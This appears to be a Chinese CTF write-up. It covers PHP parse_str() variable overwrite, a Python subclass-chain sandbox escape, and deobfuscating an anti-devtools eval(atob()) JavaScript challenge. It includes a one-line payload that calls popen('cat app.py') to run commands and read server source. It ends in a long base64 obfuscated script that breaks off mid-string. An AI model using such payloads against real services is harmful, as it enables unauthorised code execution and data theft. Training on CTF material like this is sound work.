ezPHP
parse_str()可以进行变量覆盖。
全部流量包:
菜狗工具#1
python继承链攻击。
1
| print(().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat app.py').read())
|
爆率真的高
事前准备
禁用了ctrl+U、F12、鼠标右键等操作,防止我们查看源码,这是JS造成的,我们先关闭浏览器的js,再查看源码或者打开开发者工具,最后重新打开js,刷新页面即可正常查看。
来看看前端源码:
前两段是在JavaScript中为浏览器添加事件监听器。第一个事件监听器是在鼠标右键点击页面时阻止浏览器默认的上下文菜单弹出。第二个事件监听器是在按下键盘任意键时阻止浏览器默认的键盘事件。这两段代码主要的作用是阻止浏览器执行默认操作,可以用来定制特定的页面交互行为。这就是限制的原理。
第三段是一个eval里base64加密后的js源码,是这道题的关键点,既然都在html里,我们就把整个html复制下来,放到本地环境方便调试。
为了方便调试,我们删除其他没用的元素,再删除前两段的限制,只留下关键代码:
1
2
3
4
5
6
7
8
9
10
11
12
| <!DOCTYPE html>
<html>
<head>
<title>爆率真的高</title>
<meta charset="utf-8">
</head>
<body>
<script>
eval(atob("一大堆源码………………"))
</script>
</body>
</html>
|
开调!
把那一大段base64的js源码解密了,然后把这一坨js格式化了方便查看:
大概审完一遍后只在136行找到了0.9999这个数据与题目提示的0.0001相对应。
那么就在html全局搜0.9999,断点打在这里,开始调试:
发现走过_0x4d032d()函数的时候会在控制台打出干扰信息。
发现_0x4d3fb4()函数是不断清空控制台的函数,这个也是我们的干扰。
综上,我们需要删除_0x4d032d()函数和_0x4d3fb4()所有的函数,并把0.9999删除,这样就能让程序只出flag,且不会清屏。我们将解密后的源码,删除这些东西后重新base64加密并放回eval中:
删除这两段:
删除0.9999:
重新base64加密后放到eval里。
再打开浏览器看就有了:
全源码:
1
2
3
4
5
6
7
8
9
10
11
12
| <!DOCTYPE html>
<html>
<head>
<title>爆率真的高</title>
<meta charset="utf-8">
</head>
<body>
<script>
eval(atob("ZnVuY3Rpb24gXzB4NGQ0NShfMHhkMWI2NTksXzB4YWQ3NmIpe3ZhciBfMHgyMjg0NGQ9XzB4MmE4MygpO3JldHVybiBfMHg0ZDQ1PWZ1bmN0aW9uKF8weDQ0MmU3MCxfMHgxYzM1OTgpe18weDQ0MmU3MD1fMHg0NDJlNzAtKDB4MTRmNSsweDFjYjcrLTB4MmZiZCk7dmFyIF8weDFmYzkzMz1fMHgyMjg0NGRbXzB4NDQyZTcwXTtpZihfMHg0ZDQ1WydSU25rVkknXT09PXVuZGVmaW5lZCl7dmFyIF8weDNlNWRkOT1mdW5jdGlvbihfMHgxY2QzMjEpe3ZhciBfMHgzZGU2MTQ9J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5Ky89Jzt2YXIgXzB4MWMzNDcyPScnLF8weDFlMDNjMj0nJyxfMHg0NWI4YjE9XzB4MWMzNDcyK18weDNlNWRkOTtmb3IodmFyIF8weDU3YmVhZD0tMHg0M2UrLTB4NGQ5Ki0weDUrLTB4MSoweDEzZmYsXzB4MmM0YmY4LF8weGM2NjRhNyxfMHg1ODhlNTY9MHgzKi0weDc1ZisweDEqMHgyMDFkKy0weDgwKjB4MTQ7XzB4YzY2NGE3PV8weDFjZDMyMVsnY2hhckF0J10oXzB4NTg4ZTU2KyspO35fMHhjNjY0YTcmJihfMHgyYzRiZjg9XzB4NTdiZWFkJSgtMHg3YTQqLTB4NCsweDIxYjcrMHgxKi0weDQwNDMpP18weDJjNGJmOCooMHgyMWU3Ky0weDQ1MistMHgzKjB4OWM3KStfMHhjNjY0YTc6XzB4YzY2NGE3LF8weDU3YmVhZCsrJSgtMHhkNzcrMHgxYmE5Ky0weGUyZSkpP18weDFjMzQ3Mis9XzB4NDViOGIxWydjaGFyQ29kZUF0J10oXzB4NTg4ZTU2KygweGZkMSstMHgzMTgrMHgxMSotMHhiZikpLSgweDk4ZisweDEqMHgxYzgzKy0weDEqMHgyNjA4KSE9PTB4MWMyNCsweDIxMDArLTB4MioweDFlOTI/U3RyaW5nWydmcm9tQ2hhckNvZGUnXSgtMHgxNjIqLTB4MTgrMHhjMiotMHgxMystMHgxMWNiJl8weDJjNGJmOD4+KC0oLTB4MjQwYystMHgzNCotMHgxMisweDIwNjYpKl8weDU3YmVhZCYweDIyOGMrMHgzZDQrLTB4MjY1YSkpOl8weDU3YmVhZDoweDcqMHg0YzMrLTB4OTE2KjB4NCsweDMwMyl7XzB4YzY2NGE3PV8weDNkZTYxNFsnaW5kZXhPZiddKF8weGM2NjRhNyk7fWZvcih2YXIgXzB4MTA5ZmIzPS0weDE1NTQrLTB4MTRiNisweDJhMGEsXzB4NTQwNTQ0PV8weDFjMzQ3MlsnbGVuZ3RoJ107XzB4MTA5ZmIzPF8weDU0MDU0NDtfMHgxMDlmYjMrKyl7XzB4MWUwM2MyKz0nJScrKCcwMCcrXzB4MWMzNDcyWydjaGFyQ29kZUF0J10oXzB4MTA5ZmIzKVsndG9TdHJpbmcnXSgweDEqMHgyNzAxKzB4NjgqMHg0Ky0weDI4OTEpKVsnc2xpY2UnXSgtKC0weDEqMHgyMjhiKy0weDIqLTB4MTFkNCsweDExYiotMHgxKSk7fXJldHVybiBkZWNvZGVVUklDb21wb25lbnQoXzB4MWUwM2MyKTt9O3ZhciBfMHg0MDI5Zjg9ZnVuY3Rpb24oXzB4ZmIzNGVlLF8weDUzOTY4Yil7dmFyIF8weDU4OGUzNT1bXSxfMHg1MjM3N2M9MHgyZDQqLTB4NysweDdiYisweDEqMHhjMTEsXzB4NWIyZmNkLF8weDViNTVkYT0nJztfMHhmYjM0ZWU9XzB4M2U1ZGQ5KF8weGZiMzRlZSk7dmFyIF8weDFhY2E3Zjtmb3IoXzB4MWFjYTdmPTB4MWRhMSstMHgzMjYqLTB4NSstMHgyZDVmO18weDFhY2E3ZjwtMHgxN2E3KjB4MSstMHgxKi0weDE4MmYrLTB4MSotMHg3ODtfMHgxYWNhN2YrKyl7XzB4NTg4ZTM1W18weDFhY2E3Zl09XzB4MWFjYTdmO31mb3IoXzB4MWFjYTdmPTB4ZDlmKzB4ZWI0KzB4MyotMHg5NzE7XzB4MWFjYTdmPDB4MTM0ZSotMHgxKy0weDEqMHgxNDEzKzB4Mjg2MTtfMHgxYWNhN2YrKyl7XzB4NTIzNzdjPShfMHg1MjM3N2MrXzB4NTg4ZTM1W18weDFhY2E3Zl0rXzB4NTM5NjhiWydjaGFyQ29kZUF0J10oXzB4MWFjYTdmJV8weDUzOTY4YlsnbGVuZ3RoJ10pKSUoLTB4MTM4ZSotMHgxKy0weDI0OGIrLTB4NWZmKi0weDMpLF8weDViMmZjZD1fMHg1ODhlMzVbXzB4MWFjYTdmXSxfMHg1ODhlMzVbXzB4MWFjYTdmXT1fMHg1ODhlMzVbXzB4NTIzNzdjXSxfMHg1ODhlMzVbXzB4NTIzNzdjXT1fMHg1YjJmY2Q7fV8weDFhY2E3Zj0tMHhjNiotMHg2Ky0weDEqMHg5YWQrLTB4NTA5Ki0weDEsXzB4NTIzNzdjPTB4NTE4KzB4NTMqMHgxOSstMHhkMzM7Zm9yKHZhciBfMHgxMGRmMjA9MHhkNjYrMHgxYmViKzB4NWU3Ki0weDc7XzB4MTBkZjIwPF8weGZiMzRlZVsnbGVuZ3RoJ107XzB4MTBkZjIwKyspe18weDFhY2E3Zj0oXzB4MWFjYTdmKygweDg0OCstMHgxKi0weDU1OSstMHhkYTApKSUoLTB4NjRjKy0weDI2NSotMHg5Ky0weDU5KjB4MjkpLF8weDUyMzc3Yz0oXzB4NTIzNzdjK18weDU4OGUzNVtfMHgxYWNhN2ZdKSUoMHgxKjB4MTU2NysweGJkNSsweDIwM2MqLTB4MSksXzB4NWIyZmNkPV8weDU4OGUzNVtfMHgxYWNhN2ZdLF8weDU4OGUzNVtfMHgxYWNhN2ZdPV8weDU4OGUzNVtfMHg1MjM3N2NdLF8weDU4OGUzNVtfMHg1MjM3N2NdPV8weDViMmZjZCxfMHg1YjU1ZGErPVN0cmluZ1snZnJvbUNoYXJDb2RlJ10oXzB4ZmIzNGVlWydjaGFyQ29kZUF0J10oXzB4MTBkZjIwKV5fMHg1ODhlMzVbKF8weDU4OGUzNVtfMHgxYWNhN2ZdK18weDU4OGUzNVtfMHg1MjM3N2NdKSUoLTB4MjZlOCstMHgyZDkqLTB4OSstMHgyYiotMHg1NSldKTt9cmV0dXJuIF8weDViNTVkYTt9O18weDRkNDVbJ1pSUG52ZSddPV8weDQwMjlmOCxfMHhkMWI2NTk9YXJndW1lbnRzLF8weDRkNDVbJ1JTbmtWSSddPSEhW107fXZhciBfMHg1ZDFlMWU9XzB4MjI4NDRkWy0weDcwMSsweDIyYjErLTB4MTAqMHgxYmJdLF8weDVlOWYxZT1fMHg0NDJlNzArXzB4NWQxZTFlLF8weDNjOTViNj1fMHhkMWI2NTlbXzB4NWU5ZjFlXTtpZighXzB4M2M5NWI2KXtpZihfMHg0ZDQ1Wyd0dFVrengnXT09PXVuZGVmaW5lZCl7dmFyIF8weDVkMTkyMz1mdW5jdGlvbihfMHg0MDYyNWUpe3RoaXNbJ1ZiTmhKQSddPV8weDQwNjI1ZSx0aGlzWydXalNGTlUnXT1bMHgxKi0weDFiNjkrMHgxZCotMHhkZisweDM4MyoweGYsMHgyKi0weGZlKzB4MTUqMHgxYmQrLTB4MjI4NSwtMHgxKjB4MTU2NCsweDIzMWErLTB4ZGI2XSx0aGlzWydFZnNMbW4nXT1mdW5jdGlvbigpe3JldHVybiduZXdTdGF0ZSc7fSx0aGlzWydOQk1qWm4nXT0nXHg1Y3crXHgyMCpceDVjKFx4NWMpXHgyMCp7XHg1Y3crXHgyMConLHRoaXNbJ3FIRnl6cyddPSdbXHgyN3xceDIyXS4rW1x4Mjd8XHgyMl07P1x4MjAqfSc7fTtfMHg1ZDE5MjNbJ3Byb3RvdHlwZSddWydrVE13R1InXT1mdW5jdGlvbigpe3ZhciBfMHgyODMxY2E9bmV3IFJlZ0V4cCh0aGlzWydOQk1qWm4nXSt0aGlzWydxSEZ5enMnXSksXzB4OGU5ZDI2PV8weDI4MzFjYVsndGVzdCddKHRoaXNbJ0Vmc0xtbiddWyd0b1N0cmluZyddKCkpPy0tdGhpc1snV2pTRk5VJ11bMHgxZDAxKzB4MioweDIwKy0weDkwKjB4MzRdOi0tdGhpc1snV2pTRk5VJ11bMHhjOCotMHgyKy0weDIxNTcrMHgyMmU3XTtyZXR1cm4gdGhpc1sncXB5dVNVJ10oXzB4OGU5ZDI2KTt9LF8weDVkMTkyM1sncHJvdG90eXBlJ11bJ3FweXVTVSddPWZ1bmN0aW9uKF8weDExYjMyNyl7aWYoIUJvb2xlYW4ofl8weDExYjMyNykpcmV0dXJuIF8weDExYjMyNztyZXR1cm4gdGhpc1snTUNUbGliJ10odGhpc1snVmJOaEpBJ10pO30sXzB4NWQxOTIzWydwcm90b3R5cGUnXVsnTUNUbGliJ109ZnVuY3Rpb24oXzB4MmQ4NGNmKXtmb3IodmFyIF8weGU1MzlmPS0weGYxZSsweDEqMHgxZjliKy0weDEwN2QsXzB4MzJmMGQ1PXRoaXNbJ1dqU0ZOVSddWydsZW5ndGgnXTtfMHhlNTM5ZjxfMHgzMmYwZDU7XzB4ZTUzOWYrKyl7dGhpc1snV2pTRk5VJ11bJ3B1c2gnXShNYXRoWydyb3VuZCddKE1hdGhbJ3JhbmRvbSddKCkpKSxfMHgzMmYwZDU9dGhpc1snV2pTRk5VJ11bJ2xlbmd0aCddO31yZXR1cm4gXzB4MmQ4NGNmKHRoaXNbJ1dqU0ZOVSddWzB4MTgxOCsweGYqMHgyODQrLTB4MTQ5YyoweDNdKTt9LG5ldyBfMHg1ZDE5MjMoXzB4NGQ0NSlbJ2tUTXdHUiddKCksXzB4NGQ0NVsndHRVa3p4J109ISFbXTt9XzB4MWZjOTMzPV8weDRkNDVbJ1pSUG52ZSddKF8weDFmYzkzMyxfMHgxYzM1OTgpLF8weGQxYjY1OVtfMHg1ZTlmMWVdPV8weDFmYzkzMzt9ZWxzZSBfMHgxZmM5MzM9XzB4M2M5NWI2O3JldHVybiBfMHgxZmM5MzM7fSxfMHg0ZDQ1KF8weGQxYjY1OSxfMHhhZDc2Yik7fXZhciBfMHg0MmQ2NTM9XzB4NGQ0NTsoZnVuY3Rpb24oXzB4M2RlOTU4LF8weDJiOTc3OCl7dmFyIF8weDVhOTJjYT1fMHg0ZDQ1LF8weDUzODRhNj1fMHgzZGU5NTgoKTt3aGlsZSghIVtdKXt0cnl7dmFyIF8weDFiNTVkOD1wYXJzZUludChfMHg1YTkyY2EoMHgyMWQsJyZoZV4nKSkvKC0weGU1OCsweDIqLTB4MTFlZisweDMyMzcqMHgxKStwYXJzZUludChfMHg1YTkyY2EoMHgyMTYsJzAzQXcnKSkvKC0weDJiMyotMHgxKzB4MTQqMHgyMistMHg1NTkpK3BhcnNlSW50KF8weDVhOTJjYSgweDIwZiwnQGwqZCcpKS8oMHgyKi0weGQyMisweDEqLTB4ZTAzKzB4Mjg0YSkqKC1wYXJzZUludChfMHg1YTkyY2EoMHgxZmYsJzFNYzAnKSkvKC0weDE4M2YrLTB4MjMwKy0weDI1Ki0weGI3KSkrcGFyc2VJbnQoXzB4NWE5MmNhKDB4MjI2LCc2eGIkJykpLygweDFmKi0weDFmKzB4MjFiZSstMHg4OSoweDM4KSoocGFyc2VJbnQoXzB4NWE5MmNhKDB4MjA2LCcmSHRbJykpLygtMHgxKjB4NGIzKy0weGQwNSstMHg4ZGYqLTB4MikpK3BhcnNlSW50KF8weDVhOTJjYSgweDFmMCwnaTFubycpKS8oMHgyMDM0Ky0weGRmOCstMHgxMjM1KSstcGFyc2VJbnQoXzB4NWE5MmNhKDB4MjE4LCd3QTh0JykpLygtMHgxZjFmKy0weDExOGMqLTB4MSsweGQ5YikqKHBhcnNlSW50KF8weDVhOTJjYSgweDIwMCwnQWRBRicpKS8oMHhhOTArMHhhNjEqLTB4MSstMHgyNikpK3BhcnNlSW50KF8weDVhOTJjYSgweDIyMiwnZUZVOScpKS8oMHgxYmMwKzB4MjkqMHg5MistMHgyMjEqMHgxOCkqKHBhcnNlSW50KF8weDVhOTJjYSgweDFmNywneXN6VicpKS8oLTB4MjM4MystMHgxZWZjKzB4NDI4YSkpO2lmKF8weDFiNTVkOD09PV8weDJiOTc3OClicmVhaztlbHNlIF8weDUzODRhNlsncHVzaCddKF8weDUzODRhNlsnc2hpZnQnXSgpKTt9Y2F0Y2goXzB4MjRlMmEzKXtfMHg1Mzg0YTZbJ3B1c2gnXShfMHg1Mzg0YTZbJ3NoaWZ0J10oKSk7fX19KF8weDJhODMsLTB4YTZhMzUrMHgxZmQ5KjB4NDkrMHgxKjB4ODM0NzEpKTtmdW5jdGlvbiBfMHgyYTgzKCl7dmFyIF8weGViODk0Nz1bJ2U4azBFM1JjU1cnLCdXNGUxJywnVzVxQicsJ1c2L2RTcScsJ2ZYTE9jOG9XeW1rZUJTa0tlU2tCQVcnLCdXNkR2V1IzZEhhYmxyOGt2VzQvZEg4aytXN3knLCdobW9FVzVPN0N0NG1EOGs0bUtpJywnRThrNXZhJywnV1FSY1Y4b0FXNEJkUDhrOWtyTmRVQ29nQjhvaFdRbGNMdXRjT3ZqeVc0cGRIQ29VRUNvV1dPT3VsWkZjUk1yNldRRENXN0ZkU0lwZElMbGRIbW8yam1rK2Zta0ZXUUZkSk5GY0dHdGRNcWRkTUNvVWtNMXdXT3llQzBHZmhZUmRRWDVnVzVmelc2RmNPTGZkbDhrNEVDb29XNXo0dThrZ1dQMHpxdlBxeElxeFdSWGVvOG9SV1F4ZEhLdGNUSmRkSjhvMmk4a1N5eDVFbmJ2ZWY4a2RiU2tHVzZ4Y0h1WHl6bW9uV1A1c3JDa1liMmZweFNrNFc0eGRVU29EVzZpVHdTbzhXNk9NZ3dKY0h1VmNUU29wcDBCY1RoUmNIWkhaVzRiYmwwWmNNTFQwVzUvY01MRG9XUldkV1JsY1FDa3hXUWxjSFNvWXZDa0xXUFNYVzVUd1c2ZGNJSXBjUDhvM2J0NVdDQ2tLbkNvRnNDb2tXNkN4V1JkZFZTb3dXNGZIVzQ5SGRTa3FXNUNVV1J4ZFJta05FQ29PVzdDSVdQT0FXUDlyVzU1SWdtb3d2bWtZVzZOZElxaWJXUk5kSW1vb1dQcGRKU28waWFSY1NneGNWQ2tvRW1vd1c2cjdrTDFKV1FtSVdRZThXT2xkTWc3ZEp4T1BlU29BRk1GY0lYcm9nOGtRVzZ1M1c1eGRNOGtaVzU0UWZDbzFXNEdjV1JaY1Zta3NBQ2t0VzU5T0M4azFxU2s2V09tQVc2VGNXNGkyZFNvNnltb2VuczFaQkNrVVdPUmRLOG9IV1FDa1c1ZGNKbWt3dWJsY1MyQmRUMHBkUVNrSVdPQmRPQ29ORThrQnZZRmNLYWZ2VzZ1VFdSWENXNzQrRXdmd1dSeGNOQ2tPbW1vTXNDbzh6U28zczJsY00zcUdXUVZkU0pGY1ZDb21FQ2tLY05oZFFDb1JXT0JkS0NvK1c1UmRUdFpkVXVQenhxck5XNWRkTDhvREJjeW1XNE5kUjAvZEpDb2xXT2J5ZzhvVnBYN2RIRzdkVm1rVWdDb25kQ29XenZ4ZE5OeGNVc0hpYUloZEdDb0VXNkpjVENrb1dQTmNPQ282QjhrYmZJNE94Q29ucFNvVHVlcm1pbW8wV1BkZEcxbU1XNnZ2V1A3Y1VicUFwOGtOVzR5V3c4a25XNU5kSmgzZE9IM2RSSGE5VzZyelc1UzVXNHlIVzdHbVdScVpuU2tSbmdOY084a2F3OGtyV09uTldROGdXUFdxVzRua1dRWCtXN3lhVzRHc1c0SGVXUnZrVzU0SGdHOHVyOG9XV09iRldSN2RUOGtnYVo1cHRDa3JhZnBkUFdsZE9Tb2NoOGtCVzREaVdPZTNyU2sveW1vZ2tHRmRKQ2syQm1vZFdRVmNRbW9xVzZpM2licGNPU2tCem1remhHUHFXNWorVzVHUWlxMGdiSUtrVzZ4ZFVKWGJXNXY4VzRlUFc1ZS93d25UVzVaZExtb0lXT2RkVXM0cVc1NGdibWtLV1EvY0dDazBCQ296bkNrbFdRQmNSdk9nVzcvZEg4b1BrOG9zV096bVc3dGRVTU5jVENrQUZ3U3lXUnRkUG1vaEZLbTNXNnRjUFNraUQwUmNQZU5kR0NvbGpmSDZyc0dleVovZFNta2RiSUw2VzVSY1FJbGNNcVhQb3JGZFBTa1RXTy9kUThvdldRdkRXUnhjTk1aY0hkUHNFTXZaYjNWZE9jeGNQdE5kSTA4aldRSmRTMVh0dFl6Vlc0NWpXUUJjSlg4dkFTa0hXNjlKVzU3Y1BDb2NiU2swVzd5QXNieGRLZEhBVzRKZFZtb2ttQ2tmV1JkY0xDa3lXUDdkR0NvRnl0RmRSdDNkTlp0Y1NDb2dtc21LRHVwZEdta1dxOG9rV1BtUVc0VmNOSm1tRG1vdGpOYWdXNi9jTG1rWFdQM2NOYVZjVVNvWlc0VmNJdzhkV1FpU3RDa1lqVzNjUU1mSFdROUhwSzg2VzZIQldQcUNzTmlNVzZQUFc1bGRIbW9ocm1vRFdQYVZyOGtyV094ZEp4M2RRQ295VzUzZFV4bkVXT0ZkSWZqOHE4b0ZXNi9jUUNvNVc2R2hpWG5ZV09aY1F3T1JXUG13VzZ6WFc3ZmZnbW9Rd0tkY09Da3BwQ2tJV1JPSm1ZOG9qOGtEVzVoY1BTb3NkOGtYV1BtNVdRQ3ZyYlJkTVptOVdSdGNQU29sVzRaY0p4RFFpWXBjVThrcWdMWmNHY1BEbDhvUHE4by9vcXZYcUNrR1dRbWRXT2Jkclg4dWhTb25EbWs1anRXRHM4b0p4Q2tjejFtN1dSM2RNS1N1ZlpwY1Q4a1JXUWl2cVhyT1c3UmRJQ29sV083Y1BKL2NWOG9vVzUzY084a01XN2lyYUNvL1dPSmNMMERmV1JoZExodVl2WmJXVzc3Y1Y4a1FxbW9PVzZXdFc2T0FxSUpkRzhvYVdQWmRSWTdjT0NrK1dSSmNUSVZkSGFEd2Nta1ZxWldwYm1rS1dPL2RVMEN5eENrNGF4WEhCbW9FcDEzY1Q4b2xXUGxjVUNrc2F1NEdXN3F2V1JiT1c3TytXUHBjSkw5dFc2ekpyV3RjVXJxVWR1cGRRSUZjSTN6VVdRaGNQMHhkVmRoY0xta0l4Q29YQ2VOY1AyTFZXT0ZjUGE4QVdQakRiOG9uV1I5Rm1jVDZXNDNkSThrQVdRYWl2Q29JeFNvbXY4a2V6Q29DV1BqSlc2YUNXNjNkTFNraHNKbWtXNEZkSjhrcVdSQmRHMTdkTVNvRHE4b2VXUWVBdThrOGpLQmRIOGtoV1FaZFRZRE93dW5KV1JCZElNR095V2RkVm1rRG9YZGNTbWtUVzdaZEkyZGRVM2xjTG1rTVdQL2NLOGtQVzU0dVc2ZGRIQ283VzVDY3JTazhXUEN5VzZGZFZDb3RXT0JjT1NrR0Y4a3d2YW5zVzdoZFQyWmNVZjkzV1BGZFVDa3pwdFZjS0tlSWYwdGNWWUdNV1BIQnJta1NXUHRkTm1vTldRYktXUWV5V1BxeFdPMGNXUWxjTkNreVc2M2RMOG9PVzZKZFFmQmRRU29SVzZiNm5lRmNPaFZkTVNvOWUzZktXNXRjUVcvY09TbzhXNDdkSkNvc1dPWmRMSHFBdDhrbG8wRmRIU2thV09qZVc0ZmpXNHBkSThraVdRL2RLU295VzRwZFNTbzVXUFJkTEhWZE5XR0VXNEduV1BISVc3QmRSSURHdkNvQnd0eGRJbW9ZV1E3ZElTb1BrMTNkTHFqUldPS0RlU2t1V1BOZFNTb1hXUmU0dTMxd0ZYNUhvQ29EaW1rSVc2Ym9kS2xkSzhvbGF0bGNLbW8xV1AwR1c3cGRNR2puRThvcGVXQmRPMEJkTVNvbEN1R0tXUER0VzdyUFc2VENXNjFVV1BDaFdPM2NUTFZkSm1vdFdQbU9XT1ZkUk5aZFRTa2t0aHRkVllaZEttay95U2tZYThvZldPRHRXT3VhcXZOY09tb2VXN1pjSVNrVlc3OEdjM3pzV08wV1c3THFXNVR5VzVLSXAxL2NWS3BjVm1vTFc2aGNPU2tQVzYxYWl3M2NMR0JkSkNrRXJJTmNOU2tRVzU4U29TbytXNlJkTDhrdldRbmtXUnpmV090ZEttazZrQ283VzZMaFdSSmNIZ0t5VzVIMVc0aGNVbWtGbThvVFc0blFGQ2tWVzZPTnRTa2tuTnZFV1AzY0dTb2FXN2RkU21vL1c3YjVXTzRCV1F0Y1BZcGRIZ3VhaExEcnloM2NSU29GVzdOZEplZGRHV0h5QVNvUENjTmRUOG9ZV095enZ1M2NVc1NBQndkY1BDa1NXTzl3bVNvMUVlenBXN25zV1BWZExTa2p1Q2tyVzc3Y014aGNLbWsvYk5ycGhTa0FXUjRtQU00VUJtb2ZXNGRjTkNrVFdSZlF0V2F2Vzd5eGtTa2xqU2t1d0hWZFRDbzRDdTE1dnQzZFVnVmNPbWtHblNrZ2xOaGRMYUJkU21vR3pDa01GQ29aV09OY0sybGNKZGhkUzBtR1dRbGNNbW9ja0o1c2dDazlsSFJjTjhveGJDa3BXTzVNVzZEWVc2SFRhU29CeDJ0ZFBta3RuOG9EY0poY0lDa2xld3BjVHVoZE44b0dpOG9naVlmWHJtb3VXT2xkTXZCY0dkRmNTbWs2a21vRVdQMW9XUnZNbDJGY1RMSmNKZjBNV09XcldSM2NWU294c0NraldSNHVXUldrcVNvQ1dQOU54OGtJdTB0Y0phaTlXUTlxV1BUamk4a21XNVREV090Y0pjOVd2ZFgydENrMlc3djJoVzdjUnNlK3Zta1lXNGhkUDhvM1dScjN0U285V1EzY0s4a21XNVR0VzQzY09iUmNUQ28vVzY4M3pDb1ViU2tHV1BoY1Vtb2pXUHViVzdCZEdTa1pXNEJkSGVoZFFTbzNxOG92RENrd1c1UmNOQ2tuVzViV0E4azlXNHYxVzQzY1BIaGROcldJV09GY1NlbmNXUnpSaUNrY1c1dGRWbW82V1JqdHptbytrY25UVzV1SHZta0h6U29zbW1vaVc1dGRQTXFNV1IvZEwxdGNTU2thVzROZFRta2NrbWt3VzQzZEhDb01XT0MvbnF2RGU4b0xqOG9MV1JkZE9jblZXUXE5QmgzY1AwR21GbWtpVzQwVVc1M2NIU2tSQmcvY0ttby9GdUw3eHRwZFRTbzJXUmxjUGN1UWFXVHhXTzNkSzhvTGNTbzdXUkJjU1NrRVdRYkRXNldmeUpOY1Ztb2tqZVpjUzhvd1c0ZGRObWthVzZuR1dSL2RPTjQ3amg3ZFZDb2pXNU9VVzdTelc1OTl3OG81V1B4ZEc4b2ZXUVNYVzVsY0l0VGVtZkJjVGMzY0tlU2tXN1ZjT0Nva1c0em1XN3p1Vzd0Y09TbzlvQ2s1cDNmZXZTa2x0bWtXVzczZFVtbzlXNWhkTUNrM2NJQmNWcUM5V1FyU1c3bGRIdUJjS0NvWlc2ZGNSTDEyZ2RWY1Ztb3BXNTNkTWEwOEVta0dlbWtTV08wb1dSTGhkOGtZRHZ6d3lnM2RHQ2tKVzR1dUZTb1B1MlMvV1E1NmY4a1dxU29RQVNvZW5ySmRIMW1XRU1CY0p2N2RUTkthV1BMdXNLbGRWQ29oalNrTEVtb1FXUjdjSkNvUldRRmRQeDNkSlNrcGhtb1hXUW4zVzQ3ZEttb2VXNEJkT21vNFdRTFBXNmRkUDhvSmlJL2NWVzBiczhvdVdQZGRQU29Fc04vZEc4bzRXUmZmRTJkY1EzOExXNGZTV1JuT1dReGNVOGs4V1B6ZXIwUmNHbWswY0NrVGZMSEp5VzRmelNvNVc3ZGNMWGpiVzZWY0hYekdXTy9jVEdqaVdPOFZwQ29FV09tcFdRdnV6OGt1V1FOY1NjUmRIU290eVNrN0JtbzVXUTNkR1NraHBjcWlXNGRkUDAwcnlkNUZXUXVmVzYxNlc3V1p1WS9jTzhvdFc3WmRKbWtNRkdiTHFKekNXNVNzV1FKZFIwbVpGbWtMV1BuOVdSNU5sTXBjSkNrbXVTb09XUi9jTFNrWHBiMVZpU29pQlpPM1dPM2RNdER2V1FXNWtyUHJ6dWhkT0NrMVc3VmRNbW9qRkNrQ1dRSmROOG9CeWNUUlc1SHRjQ29JV1FUYXR2cm1zTU5kSXI1MXI4azVFVy9kSkNvUWk4a29XN3YyVzY1blc3dGNUbWtwbnVHOERzM2NOckpkTlNrUmNoVzVoRzlCQmJxd1dRekxXT2RjVkwzZE1HZGRHOGszdG1vUXRhNVdXNmxjUlNrQ2RmalJXUDhrV1FGZFY4b1dXUWRkTVNrMFdQeGRQOGtyakNrZHhta2tkOG9sZzhra1c0WC9XTzVTYkhsZExlNUNXN1pjUEg4Z0I4b0h6bWt5Y2dPeVc0YWp3Q2tLVzVDaERTazZsQ282Vzc1WldSTG1jQ29IenNCY1Vta2hGU29IV1JkZEtNN2NVU2tHbkNrU1c1SmRHQ2sxVzVyYldSUmNTU29SZGRDaldQOGlyTEpjUDhvMldSMDVXN3RjSWREWlc3eGRSSUpjT3dtMFdSYW9xU2toZUt1a1dPcXZXNTBOV1ExckY4b21XUFJkTFNveVc3enFXT3RkTzhrdmdtb0R0OG9CRkdkZEpjMHFvQ29JbG1vMldQYkRXNWxkSFhKZFR4VmNTYy9kU21vMVdSMUd4U29NVzZGZEl0U1RqV3prVzdSZFVta3FXUWhkR0Nrb1dPS2JXNnZWV09IeFdSdGRRTkNLV09hZW5IaGRMTDBZRHV0ZE9Tb2xlSEpjTlNvS0ZnU2pXNUZkVkdEbWUyNThyOGs5dUNvbFdSWmRKQ282VzVaY0tnSFdhbWtCV09QTVdPN2NMU280ZUpWY01JSmNQMUdWVzROY0lDa015bW9EV09kY08ySmNHSnhjU21vRlc1NExzbWtwcENraVdRdGRIMnRjUkx2MWNtbytXT05jTUNrN2V1QmRHRycsJ2tTa2luV1JkU0hXQ3pTa2tjdUZkVUxXJywnV1FLTCcsJ2pTa3FXUHUzcDhrNlc2UGRXUFJjSXh5TVdPVmNSVycsJ2xDa1FnYlZjUGEnLCd5MjdjU21vUXpDb0VXUXZ4amdLUXVXJywnZlc5TXEwQmRSbWtUJywnbFl4Y0xLTmRPU284aENvMldQSmNUWGEnLCdXT2Z0aVNrZFdQeGRHTW1va0cvZFBLVycsJ1c1Q2wnLCcnLCd2ZkhNc3dsZFVTa2ZXNGknLCdBTTNjU21vSGJta2xXUVhxbTF1JywnVzVXaVdRVmRLbWtoV1JGZEt3SycsJ2ZmN2NVc2hkTUhmaGJDazFFbW9IJywnaGdkZE9yOGhxbW9BVzRpJywnZzhvd1dSZldXNTQnLCdXN0dneUNveldPN2NOZ212ZVdTJywnVzQvY0pTb2JEMDlTRldOZFBmYkRrVycsJ0VhUmNMYScsJ2tIUmRSU2t2b3EnLCdnMUpjVXRGY01idmhxU2srRjhvWVc3T1VXN1JjU2Y5M1dPanB0Q2tFcmJwY053SmNJSU5jSUNrUkRta3VXUHBjT0dUV2s4bzdXN1BIVzY3Y1ZTb3ZtOG91V09lL2MzQmNRdlpjUkpLaFc1WHNDOGtPeDJOZFYzTGFXNzdjVEhOZFMwQmRTaEZkS3FKY01tb0RXUWZxV095K2pjbVhXN2YremVkZE5Tb2ZtY3VUQ21vQVc3ZGRJdnlmVzUvY0plV2FXUHo4YThrY1dPcGRMZzRsRmZkY1VKeGNKYVZjUENvVm5tay9XNU9ackNrb1dSN2NLWGhjTjhrVHl1bGRRMGhjSm1vSmFhRmNUbWtrbldkZE04b0NXUjF2VzdOZEhMOUFXUmxkVGdCZElNeVp4dGE3VzZoY1NybllXNzQ2VzUwc1c1VDNXNlpkUENvSFdRM2NJSGRjVHdOY1B0aGNUQ2tVV1JUcmVDb25GdWRjVkNvVVdPeklzYUZjVHhlQlc0eGRWd3Z3VzRuMldQOFdtU2twV1A0b3hjbGNNZmZmVzRicGlXM2RV